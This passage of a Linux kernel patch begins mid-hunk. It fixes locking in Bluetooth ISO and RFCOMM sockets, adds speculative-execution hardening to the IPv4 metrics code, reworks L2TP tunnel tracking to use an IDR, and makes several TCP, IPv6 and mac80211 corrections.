++	lock_sock(sk);
++
++	/* Update source addr of the socket */
++	bacpy(&iso_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		iso_sock_clear_timer(sk);
+@@ -300,7 +305,10 @@ static int iso_connect_bis(struct sock *sk)
+ 		iso_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
+-done:
++	release_sock(sk);
++	return err;
++
++unlock:
+ 	hci_dev_unlock(hdev);
+ 	hci_dev_put(hdev);
+ 	return err;
+@@ -324,13 +332,13 @@ static int iso_connect_cis(struct sock *sk)
+ 
+ 	if (!cis_central_capable(hdev)) {
+ 		err = -EOPNOTSUPP;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Fail if either PHYs are marked as disabled */
+ 	if (!iso_pi(sk)->qos.in.phy && !iso_pi(sk)->qos.out.phy) {
+ 		err = -EINVAL;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+ 	/* Just bind if DEFER_SETUP has been set */
+@@ -340,7 +348,7 @@ static int iso_connect_cis(struct sock *sk)
+ 				    &iso_pi(sk)->qos);
+ 		if (IS_ERR(hcon)) {
+ 			err = PTR_ERR(hcon);
+-			goto done;
++			goto unlock;
+ 		}
+ 	} else {
+ 		hcon = hci_connect_cis(hdev, &iso_pi(sk)->dst,
+@@ -348,7 +356,7 @@ static int iso_connect_cis(struct sock *sk)
+ 				       &iso_pi(sk)->qos);
+ 		if (IS_ERR(hcon)) {
+ 			err = PTR_ERR(hcon);
+-			goto done;
++			goto unlock;
+ 		}
+ 	}
+ 
+@@ -356,15 +364,20 @@ static int iso_connect_cis(struct sock *sk)
+ 	if (!conn) {
+ 		hci_conn_drop(hcon);
+ 		err = -ENOMEM;
+-		goto done;
++		goto unlock;
+ 	}
+ 
+-	/* Update source addr of the socket */
+-	bacpy(&iso_pi(sk)->src, &hcon->src);
++	hci_dev_unlock(hdev);
++	hci_dev_put(hdev);
+ 
+ 	err = iso_chan_add(conn, sk, NULL);
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
++
++	/* Update source addr of the socket */
++	bacpy(&iso_pi(sk)->src, &hcon->src);
+ 
+ 	if (hcon->state == BT_CONNECTED) {
+ 		iso_sock_clear_timer(sk);
+@@ -377,7 +390,10 @@ static int iso_connect_cis(struct sock *sk)
+ 		iso_sock_set_timer(sk, sk->sk_sndtimeo);
+ 	}
+ 
+-done:
++	release_sock(sk);
++	return err;
++
++unlock:
+ 	hci_dev_unlock(hdev);
+ 	hci_dev_put(hdev);
+ 	return err;
+@@ -831,20 +847,23 @@ static int iso_sock_connect(struct socket *sock, struct sockaddr *addr,
+ 	bacpy(&iso_pi(sk)->dst, &sa->iso_bdaddr);
+ 	iso_pi(sk)->dst_type = sa->iso_bdaddr_type;
+ 
++	release_sock(sk);
++
+ 	if (bacmp(&iso_pi(sk)->dst, BDADDR_ANY))
+ 		err = iso_connect_cis(sk);
+ 	else
+ 		err = iso_connect_bis(sk);
+ 
+ 	if (err)
+-		goto done;
++		return err;
++
++	lock_sock(sk);
+ 
+ 	if (!test_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
+ 		err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 					 sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 	}
+ 
+-done:
+ 	release_sock(sk);
+ 	return err;
+ }
+@@ -1099,28 +1118,22 @@ static int iso_sock_recvmsg(struct socket *sock, struct msghdr *msg,
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct iso_pinfo *pi = iso_pi(sk);
+-	int err;
+ 
+ 	BT_DBG("sk %p", sk);
+ 
+-	lock_sock(sk);
+-
+ 	if (test_and_clear_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags)) {
+ 		switch (sk->sk_state) {
+ 		case BT_CONNECT2:
++			lock_sock(sk);
+ 			iso_conn_defer_accept(pi->conn->hcon);
+ 			sk->sk_state = BT_CONFIG;
+ 			release_sock(sk);
+ 			return 0;
+ 		case BT_CONNECT:
+-			err = iso_connect_cis(sk);
+-			release_sock(sk);
+-			return err;
++			return iso_connect_cis(sk);
+ 		}
+ 	}
+ 
+-	release_sock(sk);
+-
+ 	return bt_sock_recvmsg(sock, msg, len, flags);
+ }
+ 
+@@ -1415,33 +1428,29 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 	struct sock *parent;
+ 	struct sock *sk = conn->sk;
+ 	struct hci_ev_le_big_sync_estabilished *ev;
++	struct hci_conn *hcon;
+ 
+ 	BT_DBG("conn %p", conn);
+ 
+ 	if (sk) {
+ 		iso_sock_ready(conn->sk);
+ 	} else {
+-		iso_conn_lock(conn);
+-
+-		if (!conn->hcon) {
+-			iso_conn_unlock(conn);
++		hcon = conn->hcon;
++		if (!hcon)
+ 			return;
+-		}
+ 
+-		ev = hci_recv_event_data(conn->hcon->hdev,
++		ev = hci_recv_event_data(hcon->hdev,
+ 					 HCI_EVT_LE_BIG_SYNC_ESTABILISHED);
+ 		if (ev)
+-			parent = iso_get_sock_listen(&conn->hcon->src,
+-						     &conn->hcon->dst,
++			parent = iso_get_sock_listen(&hcon->src,
++						     &hcon->dst,
+ 						     iso_match_big, ev);
+ 		else
+-			parent = iso_get_sock_listen(&conn->hcon->src,
++			parent = iso_get_sock_listen(&hcon->src,
+ 						     BDADDR_ANY, NULL, NULL);
+ 
+-		if (!parent) {
+-			iso_conn_unlock(conn);
++		if (!parent)
+ 			return;
+-		}
+ 
+ 		lock_sock(parent);
+ 
+@@ -1449,30 +1458,29 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 				    BTPROTO_ISO, GFP_ATOMIC, 0);
+ 		if (!sk) {
+ 			release_sock(parent);
+-			iso_conn_unlock(conn);
+ 			return;
+ 		}
+ 
+ 		iso_sock_init(sk, parent);
+ 
+-		bacpy(&iso_pi(sk)->src, &conn->hcon->src);
+-		iso_pi(sk)->src_type = conn->hcon->src_type;
++		bacpy(&iso_pi(sk)->src, &hcon->src);
++		iso_pi(sk)->src_type = hcon->src_type;
+ 
+ 		/* If hcon has no destination address (BDADDR_ANY) it means it
+ 		 * was created by HCI_EV_LE_BIG_SYNC_ESTABILISHED so we need to
+ 		 * initialize using the parent socket destination address.
+ 		 */
+-		if (!bacmp(&conn->hcon->dst, BDADDR_ANY)) {
+-			bacpy(&conn->hcon->dst, &iso_pi(parent)->dst);
+-			conn->hcon->dst_type = iso_pi(parent)->dst_type;
+-			conn->hcon->sync_handle = iso_pi(parent)->sync_handle;
++		if (!bacmp(&hcon->dst, BDADDR_ANY)) {
++			bacpy(&hcon->dst, &iso_pi(parent)->dst);
++			hcon->dst_type = iso_pi(parent)->dst_type;
++			hcon->sync_handle = iso_pi(parent)->sync_handle;
+ 		}
+ 
+-		bacpy(&iso_pi(sk)->dst, &conn->hcon->dst);
+-		iso_pi(sk)->dst_type = conn->hcon->dst_type;
++		bacpy(&iso_pi(sk)->dst, &hcon->dst);
++		iso_pi(sk)->dst_type = hcon->dst_type;
+ 
+-		hci_conn_hold(conn->hcon);
+-		__iso_chan_add(conn, sk, parent);
++		hci_conn_hold(hcon);
++		iso_chan_add(conn, sk, parent);
+ 
+ 		if (test_bit(BT_SK_DEFER_SETUP, &bt_sk(parent)->flags))
+ 			sk->sk_state = BT_CONNECT2;
+@@ -1483,8 +1491,6 @@ static void iso_conn_ready(struct iso_conn *conn)
+ 		parent->sk_data_ready(parent);
+ 
+ 		release_sock(parent);
+-
+-		iso_conn_unlock(conn);
+ 	}
+ }
+ 
+diff --git a/net/bluetooth/mgmt_util.h b/net/bluetooth/mgmt_util.h
+index 6a8b7e84293df..bdf978605d5a8 100644
+--- a/net/bluetooth/mgmt_util.h
++++ b/net/bluetooth/mgmt_util.h
+@@ -27,7 +27,7 @@ struct mgmt_mesh_tx {
+ 	struct sock *sk;
+ 	u8 handle;
+ 	u8 instance;
+-	u8 param[sizeof(struct mgmt_cp_mesh_send) + 29];
++	u8 param[sizeof(struct mgmt_cp_mesh_send) + 31];
+ };
+ 
+ struct mgmt_pending_cmd {
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index 21e24da4847f0..4397e14ff560f 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -391,6 +391,7 @@ static int rfcomm_sock_connect(struct socket *sock, struct sockaddr *addr, int a
+ 	    addr->sa_family != AF_BLUETOOTH)
+ 		return -EINVAL;
+ 
++	sock_hold(sk);
+ 	lock_sock(sk);
+ 
+ 	if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+@@ -410,14 +411,18 @@ static int rfcomm_sock_connect(struct socket *sock, struct sockaddr *addr, int a
+ 	d->sec_level = rfcomm_pi(sk)->sec_level;
+ 	d->role_switch = rfcomm_pi(sk)->role_switch;
+ 
++	/* Drop sock lock to avoid potential deadlock with the RFCOMM lock */
++	release_sock(sk);
+ 	err = rfcomm_dlc_open(d, &rfcomm_pi(sk)->src, &sa->rc_bdaddr,
+ 			      sa->rc_channel);
+-	if (!err)
++	lock_sock(sk);
++	if (!err && !sock_flag(sk, SOCK_ZAPPED))
+ 		err = bt_sock_wait_state(sk, BT_CONNECTED,
+ 				sock_sndtimeo(sk, flags & O_NONBLOCK));
+ 
+ done:
+ 	release_sock(sk);
++	sock_put(sk);
+ 	return err;
+ }
+ 
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index f64654df71a29..4c1707d0eb9b0 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -137,12 +137,12 @@ static int ops_init(const struct pernet_operations *ops, struct net *net)
+ 		return 0;
+ 
+ 	if (ops->id && ops->size) {
+-cleanup:
+ 		ng = rcu_dereference_protected(net->gen,
+ 					       lockdep_is_held(&pernet_ops_rwsem));
+ 		ng->ptr[*ops->id] = NULL;
+ 	}
+ 
++cleanup:
+ 	kfree(data);
+ 
+ out:
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index ce9ff3c62e840..3bb890a40ed73 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -30,6 +30,7 @@
+ #include <linux/slab.h>
+ #include <linux/netlink.h>
+ #include <linux/hash.h>
++#include <linux/nospec.h>
+ 
+ #include <net/arp.h>
+ #include <net/inet_dscp.h>
+@@ -1022,6 +1023,7 @@ bool fib_metrics_match(struct fib_config *cfg, struct fib_info *fi)
+ 		if (type > RTAX_MAX)
+ 			return false;
+ 
++		type = array_index_nospec(type, RTAX_MAX + 1);
+ 		if (type == RTAX_CC_ALGO) {
+ 			char tmp[TCP_CA_NAME_MAX];
+ 			bool ecn_ca = false;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 67f5e54408020..a5711b8f4cb19 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -650,8 +650,20 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	spin_lock(lock);
+ 	if (osk) {
+ 		WARN_ON_ONCE(sk->sk_hash != osk->sk_hash);
+-		ret = sk_nulls_del_node_init_rcu(osk);
+-	} else if (found_dup_sk) {
++		ret = sk_hashed(osk);
++		if (ret) {
++			/* Before deleting the node, we insert a new one to make
++			 * sure that the look-up-sk process would not miss either
++			 * of them and that at least one node would exist in ehash
++			 * table all the time. Otherwise there's a tiny chance
++			 * that lookup process could find nothing in ehash table.
++			 */
++			__sk_nulls_add_node_tail_rcu(sk, list);
++			sk_nulls_del_node_init_rcu(osk);
++		}
++		goto unlock;
++	}
++	if (found_dup_sk) {
+ 		*found_dup_sk = inet_ehash_lookup_by_sk(sk, list);
+ 		if (*found_dup_sk)
+ 			ret = false;
+@@ -660,6 +672,7 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	if (ret)
+ 		__sk_nulls_add_node_rcu(sk, list);
+ 
++unlock:
+ 	spin_unlock(lock);
+ 
+ 	return ret;
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 1d77d992e6e77..beed32fff4841 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -91,10 +91,10 @@ void inet_twsk_put(struct inet_timewait_sock *tw)
+ }
+ EXPORT_SYMBOL_GPL(inet_twsk_put);
+ 
+-static void inet_twsk_add_node_rcu(struct inet_timewait_sock *tw,
+-				   struct hlist_nulls_head *list)
++static void inet_twsk_add_node_tail_rcu(struct inet_timewait_sock *tw,
++					struct hlist_nulls_head *list)
+ {
+-	hlist_nulls_add_head_rcu(&tw->tw_node, list);
++	hlist_nulls_add_tail_rcu(&tw->tw_node, list);
+ }
+ 
+ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+@@ -147,7 +147,7 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 
+ 	spin_lock(lock);
+ 
+-	inet_twsk_add_node_rcu(tw, &ehead->chain);
++	inet_twsk_add_node_tail_rcu(tw, &ehead->chain);
+ 
+ 	/* Step 3: Remove SK from hash chain */
+ 	if (__sk_nulls_del_node_init_rcu(sk))
+diff --git a/net/ipv4/metrics.c b/net/ipv4/metrics.c
+index 25ea6ac44db95..6a1427916c7dc 100644
+--- a/net/ipv4/metrics.c
++++ b/net/ipv4/metrics.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ #include <linux/netlink.h>
++#include <linux/nospec.h>
+ #include <linux/rtnetlink.h>
+ #include <linux/types.h>
+ #include <net/ip.h>
+@@ -28,6 +29,7 @@ static int ip_metrics_convert(struct net *net, struct nlattr *fc_mx,
+ 			return -EINVAL;
+ 		}
+ 
++		type = array_index_nospec(type, RTAX_MAX + 1);
+ 		if (type == RTAX_CC_ALGO) {
+ 			char tmp[TCP_CA_NAME_MAX];
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 4f2205756cfee..ec19ed7224536 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -435,6 +435,7 @@ void tcp_init_sock(struct sock *sk)
+ 
+ 	/* There's a bubble in the pipe until at least the first ACK. */
+ 	tp->app_limited = ~0U;
++	tp->rate_app_limited = 1;
+ 
+ 	/* See draft-stevens-tcpca-spec-01 for discussion of the
+ 	 * initialization of these values.
+@@ -3177,6 +3178,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	tp->last_oow_ack_time = 0;
+ 	/* There's a bubble in the pipe until at least the first ACK. */
+ 	tp->app_limited = ~0U;
++	tp->rate_app_limited = 1;
+ 	tp->rack.mstamp = 0;
+ 	tp->rack.advanced = 0;
+ 	tp->rack.reo_wnd_steps = 1;
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 60fd91bb5171c..c314fdde0097c 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -547,7 +547,20 @@ int ip6_forward(struct sk_buff *skb)
+ 	    pneigh_lookup(&nd_tbl, net, &hdr->daddr, skb->dev, 0)) {
+ 		int proxied = ip6_forward_proxy_check(skb);
+ 		if (proxied > 0) {
+-			hdr->hop_limit--;
++			/* It's tempting to decrease the hop limit
++			 * here by 1, as we do at the end of the
++			 * function too.
++			 *
++			 * But that would be incorrect, as proxying is
++			 * not forwarding.  The ip6_input function
++			 * will handle this packet locally, and it
++			 * depends on the hop limit being unchanged.
++			 *
++			 * One example is the NDP hop limit, that
++			 * always has to stay 255, but other would be
++			 * similar checks around RA packets, where the
++			 * user can even change the desired limit.
++			 */
+ 			return ip6_input(skb);
+ 		} else if (proxied < 0) {
+ 			__IP6_INC_STATS(net, idev, IPSTATS_MIB_INDISCARDS);
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 9a1415fe3fa78..03608d3ded4b8 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -104,9 +104,9 @@ static struct workqueue_struct *l2tp_wq;
+ /* per-net private data for this module */
+ static unsigned int l2tp_net_id;
+ struct l2tp_net {
+-	struct list_head l2tp_tunnel_list;
+-	/* Lock for write access to l2tp_tunnel_list */
+-	spinlock_t l2tp_tunnel_list_lock;
++	/* Lock for write access to l2tp_tunnel_idr */
++	spinlock_t l2tp_tunnel_idr_lock;
++	struct idr l2tp_tunnel_idr;
+ 	struct hlist_head l2tp_session_hlist[L2TP_HASH_SIZE_2];
+ 	/* Lock for write access to l2tp_session_hlist */
+ 	spinlock_t l2tp_session_hlist_lock;
+@@ -208,13 +208,10 @@ struct l2tp_tunnel *l2tp_tunnel_get(const struct net *net, u32 tunnel_id)
+ 	struct l2tp_tunnel *tunnel;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		if (tunnel->tunnel_id == tunnel_id &&
+-		    refcount_inc_not_zero(&tunnel->ref_count)) {
+-			rcu_read_unlock_bh();
+-
+-			return tunnel;
+-		}
++	tunnel = idr_find(&pn->l2tp_tunnel_idr, tunnel_id);
++	if (tunnel && refcount_inc_not_zero(&tunnel->ref_count)) {
++		rcu_read_unlock_bh();
++		return tunnel;
+ 	}
+ 	rcu_read_unlock_bh();
+ 
+@@ -224,13 +221,14 @@ EXPORT_SYMBOL_GPL(l2tp_tunnel_get);
+ 
+ struct l2tp_tunnel *l2tp_tunnel_get_nth(const struct net *net, int nth)
+ {
+-	const struct l2tp_net *pn = l2tp_pernet(net);
++	struct l2tp_net *pn = l2tp_pernet(net);
++	unsigned long tunnel_id, tmp;
+ 	struct l2tp_tunnel *tunnel;
+ 	int count = 0;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		if (++count > nth &&
++	idr_for_each_entry_ul(&pn->l2tp_tunnel_idr, tunnel, tmp, tunnel_id) {
++		if (tunnel && ++count > nth &&
+ 		    refcount_inc_not_zero(&tunnel->ref_count)) {
+ 			rcu_read_unlock_bh();
+ 			return tunnel;
+@@ -1043,7 +1041,7 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED);
+ 	nf_reset_ct(skb);
+ 
+-	bh_lock_sock(sk);
++	bh_lock_sock_nested(sk);
+ 	if (sock_owned_by_user(sk)) {
+ 		kfree_skb(skb);
+ 		ret = NET_XMIT_DROP;
+@@ -1227,6 +1225,15 @@ static void l2tp_udp_encap_destroy(struct sock *sk)
+ 		l2tp_tunnel_delete(tunnel);
+ }
+ 
++static void l2tp_tunnel_remove(struct net *net, struct l2tp_tunnel *tunnel)
++{
++	struct l2tp_net *pn = l2tp_pernet(net);
++
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	idr_remove(&pn->l2tp_tunnel_idr, tunnel->tunnel_id);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
++}
++
+ /* Workqueue tunnel deletion function */
+ static void l2tp_tunnel_del_work(struct work_struct *work)
+ {
+@@ -1234,7 +1241,6 @@ static void l2tp_tunnel_del_work(struct work_struct *work)
+ 						  del_work);
+ 	struct sock *sk = tunnel->sock;
+ 	struct socket *sock = sk->sk_socket;
+-	struct l2tp_net *pn;
+ 
+ 	l2tp_tunnel_closeall(tunnel);
+ 
+@@ -1248,12 +1254,7 @@ static void l2tp_tunnel_del_work(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	/* Remove the tunnel struct from the tunnel list */
+-	pn = l2tp_pernet(tunnel->l2tp_net);
+-	spin_lock_bh(&pn->l2tp_tunnel_list_lock);
+-	list_del_rcu(&tunnel->list);
+-	spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-
++	l2tp_tunnel_remove(tunnel->l2tp_net, tunnel);
+ 	/* drop initial ref */
+ 	l2tp_tunnel_dec_refcount(tunnel);
+ 
+@@ -1384,8 +1385,6 @@ out:
+ 	return err;
+ }
+ 
+-static struct lock_class_key l2tp_socket_class;
+-
+ int l2tp_tunnel_create(int fd, int version, u32 tunnel_id, u32 peer_tunnel_id,
+ 		       struct l2tp_tunnel_cfg *cfg, struct l2tp_tunnel **tunnelp)
+ {
+@@ -1455,12 +1454,19 @@ static int l2tp_validate_socket(const struct sock *sk, const struct net *net,
+ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 			 struct l2tp_tunnel_cfg *cfg)
+ {
+-	struct l2tp_tunnel *tunnel_walk;
+-	struct l2tp_net *pn;
++	struct l2tp_net *pn = l2tp_pernet(net);
++	u32 tunnel_id = tunnel->tunnel_id;
+ 	struct socket *sock;
+ 	struct sock *sk;
+ 	int ret;
+ 
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	ret = idr_alloc_u32(&pn->l2tp_tunnel_idr, NULL, &tunnel_id, tunnel_id,
++			    GFP_ATOMIC);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
++	if (ret)
++		return ret == -ENOSPC ? -EEXIST : ret;
++
+ 	if (tunnel->fd < 0) {
+ 		ret = l2tp_tunnel_sock_create(net, tunnel->tunnel_id,
+ 					      tunnel->peer_tunnel_id, cfg,
+@@ -1474,6 +1480,7 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 	}
+ 
+ 	sk = sock->sk;
++	lock_sock(sk);
+ 	write_lock_bh(&sk->sk_callback_lock);
+ 	ret = l2tp_validate_socket(sk, net, tunnel->encap);
+ 	if (ret < 0)
+@@ -1481,24 +1488,6 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 	rcu_assign_sk_user_data(sk, tunnel);
+ 	write_unlock_bh(&sk->sk_callback_lock);
+ 
+-	tunnel->l2tp_net = net;
+-	pn = l2tp_pernet(net);
+-
+-	sock_hold(sk);
+-	tunnel->sock = sk;
+-
+-	spin_lock_bh(&pn->l2tp_tunnel_list_lock);
+-	list_for_each_entry(tunnel_walk, &pn->l2tp_tunnel_list, list) {
+-		if (tunnel_walk->tunnel_id == tunnel->tunnel_id) {
+-			spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-			sock_put(sk);
+-			ret = -EEXIST;
+-			goto err_sock;
+-		}
+-	}
+-	list_add_rcu(&tunnel->list, &pn->l2tp_tunnel_list);
+-	spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-
+ 	if (tunnel->encap == L2TP_ENCAPTYPE_UDP) {
+ 		struct udp_tunnel_sock_cfg udp_cfg = {
+ 			.sk_user_data = tunnel,
+@@ -1512,9 +1501,16 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 
+ 	tunnel->old_sk_destruct = sk->sk_destruct;
+ 	sk->sk_destruct = &l2tp_tunnel_destruct;
+-	lockdep_set_class_and_name(&sk->sk_lock.slock, &l2tp_socket_class,
+-				   "l2tp_sock");
+ 	sk->sk_allocation = GFP_ATOMIC;
++	release_sock(sk);
++
++	sock_hold(sk);
++	tunnel->sock = sk;
++	tunnel->l2tp_net = net;
++
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	idr_replace(&pn->l2tp_tunnel_idr, tunnel, tunnel->tunnel_id);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
+ 
+ 	trace_register_tunnel(tunnel);
+ 
+@@ -1523,17 +1519,16 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 
+ 	return 0;
+ 
+-err_sock:
+-	write_lock_bh(&sk->sk_callback_lock);
+-	rcu_assign_sk_user_data(sk, NULL);
+ err_inval_sock:
+ 	write_unlock_bh(&sk->sk_callback_lock);
++	release_sock(sk);
+ 
+ 	if (tunnel->fd < 0)
+ 		sock_release(sock);
+ 	else
+ 		sockfd_put(sock);
+ err:
++	l2tp_tunnel_remove(net, tunnel);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(l2tp_tunnel_register);
+@@ -1647,8 +1642,8 @@ static __net_init int l2tp_init_net(struct net *net)
+ 	struct l2tp_net *pn = net_generic(net, l2tp_net_id);
+ 	int hash;
+ 
+-	INIT_LIST_HEAD(&pn->l2tp_tunnel_list);
+-	spin_lock_init(&pn->l2tp_tunnel_list_lock);
++	idr_init(&pn->l2tp_tunnel_idr);
++	spin_lock_init(&pn->l2tp_tunnel_idr_lock);
+ 
+ 	for (hash = 0; hash < L2TP_HASH_SIZE_2; hash++)
+ 		INIT_HLIST_HEAD(&pn->l2tp_session_hlist[hash]);
+@@ -1662,11 +1657,13 @@ static __net_exit void l2tp_exit_net(struct net *net)
+ {
+ 	struct l2tp_net *pn = l2tp_pernet(net);
+ 	struct l2tp_tunnel *tunnel = NULL;
++	unsigned long tunnel_id, tmp;
+ 	int hash;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		l2tp_tunnel_delete(tunnel);
++	idr_for_each_entry_ul(&pn->l2tp_tunnel_idr, tunnel, tmp, tunnel_id) {
++		if (tunnel)
++			l2tp_tunnel_delete(tunnel);
+ 	}
+ 	rcu_read_unlock_bh();
+ 
+@@ -1676,6 +1673,7 @@ static __net_exit void l2tp_exit_net(struct net *net)
+ 
+ 	for (hash = 0; hash < L2TP_HASH_SIZE_2; hash++)
+ 		WARN_ON_ONCE(!hlist_empty(&pn->l2tp_session_hlist[hash]));
++	idr_destroy(&pn->l2tp_tunnel_idr);
+ }
+ 
+ static struct pernet_operations l2tp_net_ops = {
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index b2e40465289d6..85d2b9e4b51ce 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -511,8 +511,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	clear_bit(HT_AGG_STATE_WANT_START, &tid_tx->state);
+ 
+-	ieee80211_agg_stop_txq(sta, tid);
+-
+ 	/*
+ 	 * Make sure no packets are being processed. This ensures that
+ 	 * we have a valid starting sequence number and that in-flight
+diff --git a/net/mac80211/debugfs_sta.c b/net/mac80211/debugfs_sta.c
+index d3397c1248d36..b057253db28d5 100644
+--- a/net/mac80211/debugfs_sta.c
++++ b/net/mac80211/debugfs_sta.c
+@@ -167,7 +167,7 @@ static ssize_t sta_aqm_read(struct file *file, char __user *userbuf,
+ 			continue;
+ 		txqi = to_txq_info(sta->sta.txq[i]);
+ 		p += scnprintf(p, bufsz + buf - p,
+-			       "%d %d %u %u %u %u %u %u %u %u %u 0x%lx(%s%s%s)\n",
++			       "%d %d %u %u %u %u %u %u %u %u %u 0x%lx(%s%s%s%s)\n",
+ 			       txqi->txq.tid,
+ 			       txqi->txq.ac,
+ 			       txqi->tin.backlog_bytes,
+@@ -182,7 +182,8 @@ static ssize_t sta_aqm_read(struct file *file, char __user *userbuf,
+ 			       txqi->flags,
+ 			       test_bit(IEEE80211_TXQ_STOP, &txqi->flags) ? "STOP" : "RUN",
+ 			       test_bit(IEEE80211_TXQ_AMPDU, &txqi->flags) ? " AMPDU" : "",
+-			       test_bit(IEEE80211_TXQ_NO_AMSDU, &txqi->flags) ? " NO-AMSDU" : "");
++			       test_bit(IEEE80211_TXQ_NO_AMSDU, &txqi->flags) ? " NO-AMSDU" : "",
++			       test_bit(IEEE80211_TXQ_DIRTY, &txqi->flags) ? " DIRTY" : "");
+ 	}
+ 
+ 	rcu_read_unlock();
+diff --git a/net/mac80211/driver-ops.h b/net/mac80211/driver-ops.h
+index 81e40b0a3b167..e685c12757f4b 100644
+--- a/net/mac80211/driver-ops.h
++++ b/net/mac80211/driver-ops.h
+@@ -1183,7 +1183,7 @@ static inline void drv_wake_tx_queue(struct ieee80211_local *local,
+ 
+ 	/* In reconfig don't transmit now, but mark for waking later */
+ 	if (local->in_reconfig) {
+-		set_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txq->flags);
++		set_bit(IEEE80211_TXQ_DIRTY, &txq->flags);
+ 		return;
+ 	}
+ 
+diff --git a/net/mac80211/ht.c b/net/mac80211/ht.c
+index 83bc41346ae7f..ae42e956eff5a 100644
+--- a/net/mac80211/ht.c
++++ b/net/mac80211/ht.c
+@@ -391,6 +391,43 @@ void ieee80211_ba_session_work(struct work_struct *work)
+ 
+ 		tid_tx = sta->ampdu_mlme.tid_start_tx[tid];
+ 		if (!blocked && tid_tx) {
++			struct ieee80211_sub_if_data *sdata = sta->sdata;
++			struct ieee80211_local *local = sdata->local;
++
++			if (local->ops->wake_tx_queue) {
++				struct txq_info *txqi =
++					to_txq_info(sta->sta.txq[tid]);
++				struct fq *fq = &local->fq;
++
++				spin_lock_bh(&fq->lock);
++
++				/* Allow only frags to be dequeued */
++				set_bit(IEEE80211_TXQ_STOP, &txqi->flags);
++
++				if (!skb_queue_empty(&txqi->frags)) {
++					/* Fragmented Tx is ongoing, wait for it
++					 * to finish. Reschedule worker to retry
++					 * later.
++					 */
++
++					spin_unlock_bh(&fq->lock);
++					spin_unlock_bh(&sta->lock);
++
++					/* Give the task working on the txq a
++					 * chance to send out the queued frags
++					 */
++					synchronize_net();
++
++					mutex_unlock(&sta->ampdu_mlme.mtx);
++
++					ieee80211_queue_work(&sdata->local->hw,
++							     work);
++					return;
++				}
++
++				spin_unlock_bh(&fq->lock);
++			}
++
+ 			/*
+ 			 * Assign it over to the normal tid_tx array
+ 			 * where it "goes live".
